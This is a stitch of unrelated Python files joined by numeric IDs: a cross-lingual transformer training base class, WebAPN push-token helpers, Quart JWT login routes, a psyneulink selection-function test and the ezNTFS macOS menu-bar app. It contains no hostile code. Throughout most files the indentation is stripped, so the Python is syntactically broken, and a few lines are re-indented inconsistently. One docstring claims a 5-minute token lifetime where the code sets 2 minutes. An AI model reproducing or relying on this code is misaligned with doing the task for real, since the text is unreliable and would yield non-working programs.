self.tokenizer = AutoTokenizer.from_pretrained(hparams.pretrain)
self.model = self.build_model()
self.freeze_layers()
self.weight = nn.Parameter(torch.zeros(self.num_layers))
self.mapping = None
if hparams.mapping:
assert os.path.isfile(hparams.mapping)
self.mapping = torch.load(hparams.mapping)
util.freeze(self.mapping)
self.projector = self.build_projector()
self.dropout = InputVariationalDropout(hparams.input_dropout)
def build_model(self):
config = AutoConfig.from_pretrained(
self.hparams.pretrain, output_hidden_states=True
)
model = AutoModel.from_pretrained(self.hparams.pretrain, config=config)
return model
def freeze_layers(self):
if self.hparams.freeze_layer == -1:
return
elif self.hparams.freeze_layer >= 0:
for i in range(self.hparams.freeze_layer + 1):
if i == 0:
print("freeze embeddings")
self.freeze_embeddings()
else:
print(f"freeze layer {i}")
self.freeze_layer(i)
def freeze_embeddings(self):
if isinstance(self.model, transformers.BertModel) or isinstance(
self.model, transformers.RobertaModel
):
util.freeze(self.model.embeddings)
elif isinstance(self.model, transformers.XLMModel):
util.freeze(self.model.position_embeddings)
if self.model.n_langs > 1 and self.model.use_lang_emb:
util.freeze(self.model.lang_embeddings)
util.freeze(self.model.embeddings)
else:
raise ValueError("Unsupported model")
def freeze_layer(self, layer):
if isinstance(self.model, transformers.BertModel) or isinstance(
self.model, transformers.RobertaModel
):
util.freeze(self.model.encoder.layer[layer - 1])
elif isinstance(self.model, transformers.XLMModel):
util.freeze(self.model.attentions[layer - 1])
util.freeze(self.model.layer_norm1[layer - 1])
util.freeze(self.model.ffns[layer - 1])
util.freeze(self.model.layer_norm2[layer - 1])
else:
raise ValueError("Unsupported model")
@property
def hidden_size(self):
if isinstance(self.model, transformers.BertModel) or isinstance(
self.model, transformers.RobertaModel
):
return self.model.config.hidden_size
elif isinstance(self.model, transformers.XLMModel):
return self.model.dim
else:
raise ValueError("Unsupported model")
@property
def num_layers(self):
if isinstance(self.model, transformers.BertModel) or isinstance(
self.model, transformers.RobertaModel
):
return self.model.config.num_hidden_layers + 1
elif isinstance(self.model, transformers.XLMModel):
return self.model.n_layers + 1
else:
raise ValueError("Unsupported model")
@property
def batch_per_epoch(self):
if self.trn_datasets is None:
self.trn_datasets = self.prepare_datasets(Split.train)
        if self._batch_per_epoch < 0:
            total_datasize = sum(len(d) for d in self.trn_datasets)
            self._batch_per_epoch = int(np.ceil(total_datasize / self.hparams.batch_size))
return self._batch_per_epoch
@property
def selection_criterion(self):
assert self._selection_criterion is not None
return self._selection_criterion
    @property
    def comparison(self):
        assert self._comparison is not None
        return self._comparison
def setup_metrics(self):
assert self._metric is not None
langs = self.hparams.trn_langs + self.hparams.val_langs + self.hparams.tst_langs
langs = sorted(list(set(langs)))
for lang in langs:
self.metrics[lang] = deepcopy(self._metric)
self.reset_metrics()
def reset_metrics(self):
for metric in self.metrics.values():
metric.reset()
def build_projector(self):
hparams = self.hparams
if hparams.projector == "id":
return Identity()
elif hparams.projector == "meanpool":
return MeanPooling()
elif hparams.projector == "transformer":
return Transformer(
input_dim=self.hidden_size,
hidden_dim=hparams.projector_trm_hidden_size,
num_heads=hparams.projector_trm_num_heads,
dropout=hparams.projector_dropout,
num_layers=hparams.projector_trm_num_layers,
)
else:
raise ValueError(hparams.projector)
def get_mask(self, sent: Tensor):
mask = (sent != self.tokenizer.pad_token_id).long()
return mask
def encode_sent(
self,
sent: Tensor,
langs: Optional[List[str]] = None,
segment: Optional[Tensor] = None,
model: Optional[transformers.PreTrainedModel] = None,
return_raw_hidden_states: bool = False,
):
if model is None:
model = self.model
mask = self.get_mask(sent)
        if isinstance(model, transformers.BertModel) or isinstance(
            model, transformers.RobertaModel
        ):
output = model(input_ids=sent, attention_mask=mask, token_type_ids=segment)
elif isinstance(model, transformers.XLMModel):
            lang_ids: Optional[torch.Tensor] = None
if langs is not None:
try:
batch_size, seq_len = sent.shape
lang_ids = torch.tensor(
[self.tokenizer.lang2id[lang] for lang in langs],
dtype=torch.long,
device=sent.device,
)
lang_ids = lang_ids.unsqueeze(1).expand(batch_size, seq_len)
except KeyError as e:
print(f"KeyError with missing language {e}")
lang_ids = None
output = model(
input_ids=sent,
attention_mask=mask,
langs=lang_ids,
token_type_ids=segment,
)
else:
raise ValueError("Unsupported model")
if return_raw_hidden_states:
return output["hidden_states"]
hs = self.map_feature(output["hidden_states"], langs)
hs = self.process_feature(hs)
hs = self.dropout(hs)
hs = self.projector(hs, mask)
return hs
def map_feature(self, hidden_states: List[Tensor], langs):
if self.mapping is None:
return hidden_states
assert len(set(langs)) == 1, "a batch should contain only one language"
lang = langs[0]
lang = constant.LANGUAGE_TO_ISO639.get(lang, lang)
if lang not in self.mapping:
return hidden_states
hs = []
for h, m in zip(hidden_states, self.mapping[lang]):
hs.append(m(h))
return hs
def process_feature(self, hidden_states: List[Tensor]):
if self.hparams.weighted_feature:
hs: Tensor = torch.stack(hidden_states)
weight = F.softmax(self.weight, dim=0).view(-1, 1, 1, 1)
hs = hs * weight
hs = hs.sum(dim=0)
else:
hs = hidden_states[self.hparams.feature_layer]
return hs
def evaluation_step_helper(self, batch, prefix) -> Dict[str, Tensor]:
raise NotImplementedError
def validation_step(self, batch, batch_idx, dataloader_idx=0):
return self.evaluation_step_helper(batch, "val")
def test_step(self, batch, batch_idx, dataloader_idx=0):
return self.evaluation_step_helper(batch, "tst")
def training_epoch_end(self, outputs):
return
def aggregate_outputs(
self, outputs: List[List[Dict[str, Tensor]]], langs: List[str], prefix: str
):
assert prefix in ["val", "tst"]
aver_result = defaultdict(list)
for lang, output in zip(langs, outputs):
for key in output[0]:
mean_val = torch.stack([x[key] for x in output]).mean()
self.log(key, mean_val)
raw_key = key.replace(f"{lang}_", "")
aver_result[raw_key].append(mean_val)
for key, vals in aver_result.items():
self.log(key, torch.stack(vals).mean())
def aggregate_metrics(self, langs: List[str], prefix: str):
aver_metric = defaultdict(list)
for lang in langs:
metric = self.metrics[lang]
for key, val in metric.get_metric().items():
self.log(f"{prefix}_{lang}_{key}", val)
aver_metric[key].append(val)
for key, vals in aver_metric.items():
self.log(f"{prefix}_{key}", torch.stack(vals).mean())
def validation_epoch_end(self, outputs):
if len(self.hparams.val_langs) == 1:
outputs = [outputs]
self.aggregate_outputs(outputs, self.hparams.val_langs, "val")
self.aggregate_metrics(self.hparams.val_langs, "val")
return
def test_epoch_end(self, outputs):
if len(self.hparams.tst_langs) == 1:
outputs = [outputs]
self.aggregate_outputs(outputs, self.hparams.tst_langs, "tst")
self.aggregate_metrics(self.hparams.tst_langs, "tst")
return
def get_warmup_and_total_steps(self):
if self.hparams.max_steps is not None:
max_steps = self.hparams.max_steps
else:
max_steps = self.hparams.max_epochs * self.batch_per_epoch
assert not (
self.hparams.warmup_steps != -1 and self.hparams.warmup_portion != -1
)
if self.hparams.warmup_steps != -1:
assert self.hparams.warmup_steps > 0
warmup_steps = self.hparams.warmup_steps
elif self.hparams.warmup_portion != -1:
assert 0 < self.hparams.warmup_portion < 1
warmup_steps = int(max_steps * self.hparams.warmup_portion)
else:
warmup_steps = 1
return warmup_steps, max_steps
def configure_optimizers(self):
no_decay = ["bias", "LayerNorm.weight"]
optimizer_grouped_parameters = []
optimizer_grouped_parameters.append(
{
"params": [
p
for n, p in self.named_parameters()
if not any(nd in n for nd in no_decay)
],
"weight_decay": self.hparams.weight_decay,
}
)
optimizer_grouped_parameters.append(
{
"params": [
p
for n, p in self.named_parameters()
if any(nd in n for nd in no_decay)
],
"weight_decay": 0.0,
}
)
optimizer = torch.optim.AdamW(
optimizer_grouped_parameters,
lr=self.hparams.learning_rate,
betas=(0.9, self.hparams.adam_beta2),
eps=self.hparams.adam_eps,
)
warmup_steps, max_steps = self.get_warmup_and_total_steps()
if self.hparams.schedule == Schedule.invsqroot:
scheduler = util.get_inverse_square_root_schedule_with_warmup(
optimizer, warmup_steps
)
interval = "step"
elif self.hparams.schedule == Schedule.linear:
scheduler = util.get_linear_schedule_with_warmup(
optimizer, warmup_steps, max_steps
)
interval = "step"
elif self.hparams.schedule == Schedule.reduceOnPlateau:
scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(
optimizer, factor=0.5, patience=0, min_lr=1e-6, mode="min"
)
interval = "epoch"
else:
raise ValueError(self.hparams.schedule)
self.optimizer = optimizer
self.scheduler = scheduler
scheduler_dict = {"scheduler": scheduler, "interval": interval}
if self.hparams.schedule == Schedule.reduceOnPlateau:
scheduler_dict["monitor"] = "val_loss"
return [optimizer], [scheduler_dict]
def _get_signature(self, params: Dict):
def md5_helper(obj):
return hashlib.md5(str(obj).encode()).hexdigest()
signature = dict()
for key, val in params.items():
if key == "tokenizer" and isinstance(val, transformers.PreTrainedTokenizer):
signature[key] = md5_helper(list(val.get_vocab().items()))
else:
signature[key] = str(val)
md5 = md5_helper(list(signature.items()))
return md5, signature
def prepare_datasets(self, split: str) -> List[Dataset]:
raise NotImplementedError
def prepare_datasets_helper(
self,
data_class: Type[Dataset],
langs: List[str],
split: str,
max_len: int,
**kwargs,
):
datasets = []
for lang in langs:
filepath = data_class.get_file(self.hparams.data_dir, lang, split)
if filepath is None:
print(f"skipping {split} language: {lang}")
continue
params = {}
params["task"] = self.hparams.task
params["tokenizer"] = self.tokenizer
params["filepath"] = filepath
params["lang"] = lang
params["split"] = split
params["max_len"] = max_len
if split == Split.train:
params["subset_ratio"] = self.hparams.subset_ratio
params["subset_count"] = self.hparams.subset_count
params["subset_seed"] = self.hparams.subset_seed
params.update(kwargs)
md5, signature = self._get_signature(params)
del params["task"]
cache_file = f"{self.hparams.cache_path}/{md5}"
if self.hparams.cache_dataset and os.path.isfile(cache_file):
print(f"load from cache {filepath} with {self.hparams.pretrain}")
dataset = torch.load(cache_file)
else:
dataset = data_class(**params)
if self.hparams.cache_dataset:
print(f"save to cache {filepath} with {self.hparams.pretrain}")
torch.save(dataset, cache_file)
with open(f"{cache_file}.json", "w") as fp:
json.dump(signature, fp)
datasets.append(dataset)
return datasets
def train_dataloader(self):
if self.trn_datasets is None:
self.trn_datasets = self.prepare_datasets(Split.train)
collate = partial(util.default_collate, padding=self.padding)
if len(self.trn_datasets) == 1:
dataset = self.trn_datasets[0]
sampler = RandomSampler(dataset)
else:
dataset = ConcatDataset(self.trn_datasets)
if self.hparams.mix_sampling:
sampler = RandomSampler(dataset)
else:
sampler = util.ConcatSampler(dataset, self.hparams.batch_size)
return DataLoader(
dataset,
batch_size=self.hparams.batch_size,
sampler=sampler,
pin_memory=True,
drop_last=False,
collate_fn=collate,
num_workers=1,
)
def val_dataloader(self):
if self.val_datasets is None:
self.val_datasets = self.prepare_datasets(Split.dev)
collate = partial(util.default_collate, padding=self.padding)
return [
DataLoader(
val_dataset,
batch_size=self.hparams.eval_batch_size,
shuffle=False,
pin_memory=True,
drop_last=False,
collate_fn=collate,
num_workers=1,
)
for val_dataset in self.val_datasets
]
def test_dataloader(self):
if self.tst_datasets is None:
self.tst_datasets = self.prepare_datasets(Split.test)
collate = partial(util.default_collate, padding=self.padding)
return [
DataLoader(
tst_dataset,
batch_size=self.hparams.eval_batch_size,
shuffle=False,
pin_memory=True,
drop_last=False,
collate_fn=collate,
num_workers=1,
)
for tst_dataset in self.tst_datasets
]
@classmethod
def add_model_specific_args(cls, parent_parser):
parser = ArgumentParser(parents=[parent_parser], add_help=False)
# fmt: off
# shared
parser.add_argument("--task", required=True, choices=Task().choices(), type=str)
parser.add_argument("--data_dir", required=True, type=str)
parser.add_argument("--trn_langs", required=True, nargs="+", type=str)
parser.add_argument("--val_langs", required=True, nargs="+", type=str)
parser.add_argument("--tst_langs", default=[], nargs="*", type=str)
parser.add_argument("--max_trn_len", default=128, type=int)
parser.add_argument("--max_tst_len", default=128, type=int)
parser.add_argument("--subset_ratio", default=1.0, type=float)
parser.add_argument("--subset_count", default=-1, type=int)
parser.add_argument("--subset_seed", default=42, type=int)
parser.add_argument("--mix_sampling", default=False, type=util.str2bool)
# encoder
parser.add_argument("--pretrain", required=True, type=str)
parser.add_argument("--freeze_layer", default=-1, type=int)
parser.add_argument("--feature_layer", default=-1, type=int)
parser.add_argument("--weighted_feature", default=False, type=util.str2bool)
parser.add_argument("--projector", default="id", choices=["id", "meanpool", "transformer"], type=str)
parser.add_argument("--projector_trm_hidden_size", default=3072, type=int)
parser.add_argument("--projector_trm_num_heads", default=12, type=int)
parser.add_argument("--projector_trm_num_layers", default=4, type=int)
parser.add_argument("--projector_dropout", default=0.2, type=float)
parser.add_argument("--input_dropout", default=0.2, type=float)
parser.add_argument("--mapping", default="", type=str)
# misc
parser.add_argument("--seed", default=42, type=int)
parser.add_argument("--learning_rate", default=5e-5, type=float)
parser.add_argument("--adam_beta2", default=0.99, type=float)
parser.add_argument("--adam_eps", default=1e-8, type=float)
parser.add_argument("--weight_decay", default=0.0, type=float)
parser.add_argument("--batch_size", default=32, type=int)
parser.add_argument("--eval_batch_size", default=32, type=int)
parser.add_argument("--schedule", default=Schedule.linear, choices=Schedule().choices(), type=str)
parser.add_argument("--warmup_steps", default=-1, type=int)
parser.add_argument("--warmup_portion", default=-1, type=float)
# fmt: on
return parser
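
# --- Hedged usage sketch (not part of the original module) ---
# How add_model_specific_args is typically wired into a training entry point.
# Model is abstract here (prepare_datasets is not implemented), so in practice
# a concrete subclass would be used; the argument values below are illustrative.
if __name__ == '__main__':
    base_parser = ArgumentParser(add_help=False)
    parser = Model.add_model_specific_args(base_parser)
    # e.g. parser.parse_args(['--task', '<task>', '--data_dir', 'data/',
    #                         '--trn_langs', 'en', '--val_langs', 'en',
    #                         '--pretrain', 'bert-base-multilingual-cased'])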
|
157150
|
from app.models.APNDevice import APNDevice
from app.instances import db
from app.instances.redis import redis_db
from app.models.User import User
from os import urandom
from uuid import UUID
from flask import g
pn_redis_id_prefix = 'pn-id:'
pn_redis_id_time = 60 * 2 # In seconds
def is_valid_webapn_version(version):
    # Functional on both versions. As of August 2018, WebAPN is implemented
    # with v2, but the whole process was tested with v1. The documentation
    # does not mention what changed; Axtell appears to work with both.
    return version in (1, 2)
def add_apn_device(user, provider):
device = APNDevice(provider=provider, user=user)
db.session.add(device)
db.session.commit()
return device
def delete_apn_device(authorization_token, provider):
"""
Deletes a device.
:return: boolean if removed
"""
device = APNDevice.query.filter_by(uuid=authorization_token, provider=provider).first()
if not isinstance(device, APNDevice):
return False
db.session.delete(device)
db.session.commit()
return True
def set_apn_device(authorization_token, provider, device_token):
device = APNDevice.query.filter_by(uuid=authorization_token, provider=provider).first()
if not isinstance(device, APNDevice):
return None
device.device_id = device_token
db.session.commit()
return device
def get_temporary_id_user(authorization_token):
"""
Gets user given a temporary id
"""
redis_key = pn_redis_id_prefix + authorization_token
user_id = redis_db.get(redis_key)
if user_id is None:
return None
redis_db.delete(redis_key)
user = User.query.filter_by(id=user_id).first()
return user
def generate_temporary_id():
"""
For an authorized user. This generates a temporary (5 min lifetime)
that identifies the user. This
"""
webapn_id = str(UUID(bytes=urandom(16)))
redis_key = pn_redis_id_prefix + webapn_id
redis_db.set(redis_key, g.user.id)
redis_db.expire(redis_key, pn_redis_id_time)
return webapn_id
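
# --- Hedged illustration (not part of the original module) ---
# The handshake above is a one-time token pattern. A standalone sketch of the
# same Redis key lifecycle, assuming a reachable redis-py client; the names
# here are illustrative, not Axtell's.
def _demo_one_time_token(redis_client, user_id):
    from os import urandom
    from uuid import UUID
    token = str(UUID(bytes=urandom(16)))
    key = pn_redis_id_prefix + token
    redis_client.set(key, user_id)
    redis_client.expire(key, pn_redis_id_time)     # 2 minute lifetime
    assert redis_client.get(key) is not None
    redis_client.delete(key)                       # consumed on first lookup
    assert redis_client.get(key) is None           # single-use: gone afterwards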
|
157206
|
from quart import jsonify, request
from quart_jwt_extended import (
JWTManager, jwt_required, create_access_token,
get_jwt_identity
)
from __main__ import app
from pkg.common import user
@app.route('/login', methods=['POST'])
async def login():
if not request.is_json:
return jsonify({"msg": "Missing JSON in request"}), 400
    data = await request.get_json()
    username = data.get('username')
    password = data.get('password')
if not username:
return jsonify({"msg": "Missing username parameter"}), 400
if not password:
return jsonify({"msg": "Missing password parameter"}), 400
valid_user = user.check_user(username,password)
if not valid_user:
return jsonify({"msg": "Bad username or password"}), 401
# Identity can be any data that is json serializable
access_token = create_access_token(identity=username)
return jsonify(access_token=access_token), 200
@app.route('/signup', methods=['POST'])
async def signup():
if not request.is_json:
return jsonify({"msg": "Missing JSON in request"}), 400
    data = await request.get_json()
    username = data.get('username')
    password = data.get('password')
if not username:
return jsonify({"msg": "Missing username parameter"}), 400
if not password:
return jsonify({"msg": "Missing password parameter"}), 400
user_added = user.add_user(username,password)
if user_added:
return jsonify({"msg":"User added successfully"}), 200
else:
return jsonify({"msg":"User addition failed"}), 400
@app.route('/user', methods=['GET'])
@jwt_required
async def username():
username = get_jwt_identity()
return jsonify(username=username), 200
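
# --- Hedged usage sketch (not part of the original module) ---
# The intended flow of the three routes above, as a client helper using the
# requests library; the base URL is a placeholder for wherever the Quart app
# is served.
def _demo_client(base_url='http://localhost:5000'):
    import requests
    requests.post(base_url + '/signup', json={'username': 'alice', 'password': 's3cret'})
    resp = requests.post(base_url + '/login', json={'username': 'alice', 'password': 's3cret'})
    token = resp.json()['access_token']
    me = requests.get(base_url + '/user', headers={'Authorization': f'Bearer {token}'})
    return me.json()  # expected: {'username': 'alice'}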
|
157207
|
import numpy as np
import pytest
import psyneulink.core.components.functions.nonstateful.selectionfunctions as Functions
import psyneulink.core.globals.keywords as kw
import psyneulink.core.llvm as pnlvm
from psyneulink.core.globals.utilities import _SeededPhilox
np.random.seed(0)
SIZE=10
test_var = np.random.rand(SIZE) * 2.0 - 1.0
# the sum of probs should be 1.0
test_prob = np.random.rand(SIZE)
test_prob /= sum(test_prob)
test_philox = np.random.rand(SIZE)
test_philox /= sum(test_philox)
test_data = [
(Functions.OneHot, test_var, {'mode':kw.MAX_VAL}, [0., 0., 0., 0., 0., 0., 0., 0., 0.92732552, 0.]),
(Functions.OneHot, test_var, {'mode':kw.MAX_ABS_VAL}, [0., 0., 0., 0., 0., 0., 0., 0., 0.92732552, 0.]),
(Functions.OneHot, test_var, {'mode':kw.MAX_INDICATOR}, [0., 0., 0., 0., 0., 0., 0., 0., 1., 0.]),
(Functions.OneHot, test_var, {'mode':kw.MAX_ABS_INDICATOR}, [0., 0., 0., 0., 0., 0., 0., 0., 1., 0.]),
(Functions.OneHot, test_var, {'mode':kw.MIN_VAL}, [0., 0., 0., 0., 0., 0., 0., 0., 0., -0.23311696]),
(Functions.OneHot, test_var, {'mode':kw.MIN_ABS_VAL}, [0., 0., 0., 0.08976637, 0., 0., 0., 0., 0., 0.]),
(Functions.OneHot, test_var, {'mode':kw.MIN_INDICATOR}, [0., 0., 0., 0., 0., 0., 0., 0., 0., 1.]),
(Functions.OneHot, test_var, {'mode':kw.MIN_ABS_INDICATOR}, [0., 0., 0., 1.,0., 0., 0., 0., 0., 0.]),
(Functions.OneHot, [test_var, test_prob], {'mode':kw.PROB}, [0., 0., 0., 0.08976636599379373, 0., 0., 0., 0., 0., 0.]),
(Functions.OneHot, [test_var, test_prob], {'mode':kw.PROB_INDICATOR}, [0., 0., 0., 1., 0., 0., 0., 0., 0., 0.]),
(Functions.OneHot, [test_var, test_philox], {'mode':kw.PROB}, [0., 0.43037873274483895, 0., 0., 0., 0., 0., 0., 0., 0.]),
(Functions.OneHot, [test_var, test_philox], {'mode':kw.PROB_INDICATOR}, [0., 1., 0., 0., 0., 0., 0., 0., 0., 0.]),
]
# use list, naming function produces ugly names
names = [
"OneHot MAX_VAL",
"OneHot MAX_ABS_VAL",
"OneHot MAX_INDICATOR",
"OneHot MAX_ABS_INDICATOR",
"OneHot MIN_VAL",
"OneHot MIN_ABS_VAL",
"OneHot MIN_INDICATOR",
"OneHot MIN_ABS_INDICATOR",
"OneHot PROB",
"OneHot PROB_INDICATOR",
"OneHot PROB PHILOX",
"OneHot PROB_INDICATOR PHILOX",
]
GROUP_PREFIX="SelectionFunction "
@pytest.mark.function
@pytest.mark.integrator_function
@pytest.mark.benchmark
@pytest.mark.parametrize("func, variable, params, expected", test_data, ids=names)
def test_basic(func, variable, params, expected, benchmark, func_mode):
benchmark.group = GROUP_PREFIX + func.componentName + params['mode']
f = func(default_variable=variable, **params)
if len(variable) == 2 and variable[1] is test_philox:
f.parameters.random_state.set(_SeededPhilox([0]))
EX = pytest.helpers.get_func_execution(f, func_mode)
EX(variable)
res = EX(variable)
assert np.allclose(res, expected)
if benchmark.enabled:
benchmark(EX, variable)
|
157216
|
from Foundation import *
from AppKit import *
from PyObjCTools import AppHelper
from collections import deque
import contextlib
from enum import Enum
import os
from pathlib import Path
import shutil
import subprocess
import sys
from . import ezntfs
from . import __version__
def create_icon(symbol, description, fallback_image):
# System symbols are only available on macOS 11.0+
return (
NSImage.imageWithSystemSymbolName_accessibilityDescription_(symbol, description)
if hasattr(NSImage, "imageWithSystemSymbolName_accessibilityDescription_")
else NSImage.imageNamed_(fallback_image)
)
DEFAULT_ICON = create_icon("externaldrive.fill", "ezNTFS?", "NSNavEjectButton.normal")
BUSY_ICON = create_icon("externaldrive.fill.badge.minus", "ezNTFS (busy)", "NSNavEjectButton.rollover")
ERROR_ICON = create_icon("externaldrive.fill.badge.xmark", "ezNTFS (error)", "NSStopProgressFreestandingTemplate")
AppState = Enum("AppState", ["READY", "FAILED", "RELOADING", "MOUNTING"])
ALWAYS_SHOW_FLAG = os.getenv('EZNTFS_ALWAYS_SHOW') == "yes"
status_icons = {
AppState.READY: DEFAULT_ICON,
AppState.FAILED: ERROR_ICON,
AppState.RELOADING: BUSY_ICON,
AppState.MOUNTING: BUSY_ICON,
}
class AppDelegate(NSObject):
def applicationDidFinishLaunching_(self, sender):
self.initializeAppState()
self.initializeAppUi()
self.env = self.detectEnvironment()
        if self.state is not AppState.FAILED:
self.observeMountChanges()
self.goNext()
def runOnMainThread_with_(self, method, payload):
self.performSelectorOnMainThread_withObject_waitUntilDone_(
method, payload, False
)
def initializeAppState(self):
self.state = AppState.READY
self.failure = None
self.needs_reload = True
self.volumes = []
self.mount_queue = deque()
self.mounting = None
self.last_mount_failed = None
def initializeAppUi(self):
status_bar = NSStatusBar.systemStatusBar()
status_item = status_bar.statusItemWithLength_(NSVariableStatusItemLength)
status_item.setVisible_(False)
button = status_item.button()
button.setTitle_("ezNTFS")
button.setImage_(DEFAULT_ICON)
button.setToolTip_(f"ezNTFS {__version__}")
menu = NSMenu.new()
menu.setAutoenablesItems_(False)
status_item.setMenu_(menu)
self.status_item = status_item
def detectEnvironment(self):
try:
env = ezntfs.get_environment_info()
if env.fuse is None:
self.handleFail_("Failed to detect macFUSE")
elif env.ntfs_3g is None:
self.handleFail_("Failed to detect ntfs-3g")
elif not env.can_mount:
self.handleFail_("Missing privileges to mount via ntfs-3g")
return env
except:
self.handleFail_("Failed to detect the environment")
def observeMountChanges(self):
workspace = NSWorkspace.sharedWorkspace()
notification_center = workspace.notificationCenter()
notification_center.addObserver_selector_name_object_(self, "handleVolumeDidMount:", NSWorkspaceDidMountNotification, None)
notification_center.addObserver_selector_name_object_(self, "handleVolumeDidUnmount:", NSWorkspaceDidUnmountNotification, None)
notification_center.addObserver_selector_name_object_(self, "handleVolumeDidRename:", NSWorkspaceDidRenameVolumeNotification, None)
def handleVolumeDidMount_(self, notification):
if self.state is AppState.FAILED:
return
if self.state is AppState.READY:
path = notification.userInfo()[NSWorkspaceVolumeURLKey].path()
self.needs_reload = path
else:
self.needs_reload = True
self.goNext()
def handleVolumeDidUnmount_(self, notification):
if self.state is AppState.FAILED:
return
url = notification.userInfo()[NSWorkspaceVolumeURLKey]
volume = self.findVolumeWithUrl_(url)
if self.state is AppState.READY:
if volume is not None:
self.removeVolume_(volume)
elif volume is not None and self.isMountingVolume_(volume):
pass
else:
self.needs_reload = True
self.goNext()
def handleVolumeDidRename_(self, notification):
if self.state is AppState.FAILED:
return
old_url = notification.userInfo()[NSWorkspaceVolumeOldURLKey]
old_volume = self.findVolumeWithUrl_(old_url)
if self.state is AppState.READY:
if old_volume is not None:
                new_name = notification.userInfo()[NSWorkspaceVolumeLocalizedNameKey]
                new_path = notification.userInfo()[NSWorkspaceVolumeURLKey].path()
new_volume = old_volume._replace(name=new_name, mount_path=new_path)
self.addVolume_(new_volume)
else:
self.needs_reload = True
self.goNext()
def goNext(self):
if self.state is not AppState.READY:
pass
elif self.needs_reload:
if isinstance(self.needs_reload, str):
self.goAddVolume_(self.needs_reload)
else:
self.goReloadVolumeList()
self.needs_reload = False
elif len(self.mount_queue) > 0:
volume = self.mount_queue.popleft()
self.goMountVolume_(volume)
self.refreshUi()
def findVolumeWithUrl_(self, url):
path = url.path()
return next((v for v in self.volumes if v.mount_path == path), None)
def fail_(self, message):
self.runOnMainThread_with_(self.handleFail_, message)
def handleFail_(self, message):
self.state = AppState.FAILED
self.failure = message
self.goNext()
def goReloadVolumeList(self):
self.state = AppState.RELOADING
self.performSelectorInBackground_withObject_(self.doReloadVolumeList_, None)
def doReloadVolumeList_(self, nothing):
try:
volumes = ezntfs.get_all_ntfs_volumes().values()
self.runOnMainThread_with_(self.handleReloadVolumeList_, volumes)
except:
self.fail_("Failed to retrieve NTFS volumes")
def handleReloadVolumeList_(self, volumes):
        if self.state is AppState.FAILED:
return
self.state = AppState.READY
self.volumes = [v for v in volumes if v.mounted or v.internal or self.isMountingVolume_(v)]
self.volumes.sort(key=lambda v: v.id)
self.goNext()
def goAddVolume_(self, volumeIdOrPath):
self.state = AppState.RELOADING
self.performSelectorInBackground_withObject_(self.doAddVolume_, volumeIdOrPath)
def doAddVolume_(self, volumeIdOrPath):
try:
volume = ezntfs.get_ntfs_volume(volumeIdOrPath)
self.runOnMainThread_with_(self.handleAddVolume_, volume)
except:
self.fail_("Failed to retrieve NTFS volumes")
def handleAddVolume_(self, volume):
if self.state is AppState.FAILED:
return
self.state = AppState.READY
if volume is not None:
self.addVolume_(volume)
self.goNext()
def addVolume_(self, volume):
self.removeVolume_(volume)
self.volumes.append(volume)
self.volumes.sort(key=lambda v: v.id)
def removeVolume_(self, volume):
self.volumes = [v for v in self.volumes if v.id != volume.id]
def refreshUi(self):
self.status_item.button().setImage_(status_icons[self.state])
menu = self.status_item.menu()
menu.removeAllItems()
if self.state is AppState.FAILED:
self.addTextItem_withLabel_(menu, self.failure)
else:
if self.last_mount_failed is not None:
self.addTextItem_withLabel_(menu, f"Failed to mount: {self.last_mount_failed.name}")
menu.addItem_(NSMenuItem.separatorItem())
self.addVolumeItems_(menu)
menu.addItem_(NSMenuItem.separatorItem())
menu.addItemWithTitle_action_keyEquivalent_("Quit", "terminate:", "")
self.status_item.setVisible_(self.state is AppState.FAILED or ALWAYS_SHOW_FLAG or len(self.volumes) > 0)
def addTextItem_withLabel_(self, menu, label):
item = menu.addItemWithTitle_action_keyEquivalent_(label, "", "")
item.setEnabled_(False)
def addVolumeItems_(self, menu):
if len(self.volumes) == 0:
self.addTextItem_withLabel_(menu, "No NTFS volumes found")
for volume in self.volumes:
label = f"{volume.name} [{volume.size}]"
item = menu.addItemWithTitle_action_keyEquivalent_(label, "handleVolumeClicked:", "")
item.setRepresentedObject_(volume)
if self.isMountingVolume_(volume) or self.willMountVolume_(volume):
item.setEnabled_(False)
item.setToolTip_("Mounting...")
elif volume.access is ezntfs.Access.WRITABLE:
item.setState_(NSControlStateValueOn)
item.setEnabled_(False)
item.setToolTip_("Volume is writable")
else:
item.setToolTip_("Click to mount with ntfs-3g")
def isMountingVolume_(self, volume):
return self.mounting is not None and self.mounting.id == volume.id
def willMountVolume_(self, volume):
return volume.id in (v.id for v in self.mount_queue)
def handleVolumeClicked_(self, menu_item):
volume = menu_item.representedObject()
self.mount_queue.append(volume)
self.goNext()
def goMountVolume_(self, volume):
self.state = AppState.MOUNTING
self.mounting = volume
self.performSelectorInBackground_withObject_(self.doMountVolume_, volume)
def doMountVolume_(self, volume):
try:
if volume.access is ezntfs.Access.WRITABLE:
return self.runOnMainThread_with_(self.handleMountVolumeOk_, volume)
if volume.mounted:
ok = ezntfs.macos_unmount(volume)
if not ok:
return self.runOnMainThread_with_(self.handleMountVolumeFail_, volume)
ok = ezntfs.mount(volume, version=self.env.ntfs_3g, path=volume.mount_path)
if not ok:
if volume.mounted:
ezntfs.macos_mount(volume)
return self.runOnMainThread_with_(self.handleMountVolumeFail_, volume)
self.runOnMainThread_with_(self.handleMountVolumeOk_, volume)
except:
self.runOnMainThread_with_(self.handleMountVolumeFail_, volume)
def handleMountVolumeOk_(self, volume):
if self.state is AppState.FAILED:
return
self.state = AppState.READY
self.addVolume_(volume._replace(access=ezntfs.Access.WRITABLE))
self.mounting = None
self.last_mount_failed = None
self.goNext()
def handleMountVolumeFail_(self, volume):
if self.state is AppState.FAILED:
return
self.state = AppState.READY
self.needs_reload = True
self.mounting = None
self.last_mount_failed = volume
self.goNext()
def main():
if len(sys.argv) <= 1:
return launch_app()
command = sys.argv[1]
if command == "install":
return install()
elif command == "uninstall":
return uninstall()
print(f"Unknown command: {command}")
sys.exit(1)
def launch_app():
app = NSApplication.sharedApplication()
delegate = AppDelegate.new()
app.setDelegate_(delegate)
app.setActivationPolicy_(NSApplicationActivationPolicyProhibited)
AppHelper.runEventLoop()
APP_NAME = "com.lezgomatt.ezntfs"
LAUNCHD_CONFIG_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>{app_name}</string>
<key>EnvironmentVariables</key>
<dict>
<key>NTFS_3G_PATH</key>
<string>{ntfs_3g_path}</string>
</dict>
<key>Program</key>
<string>{app_path}</string>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>"""
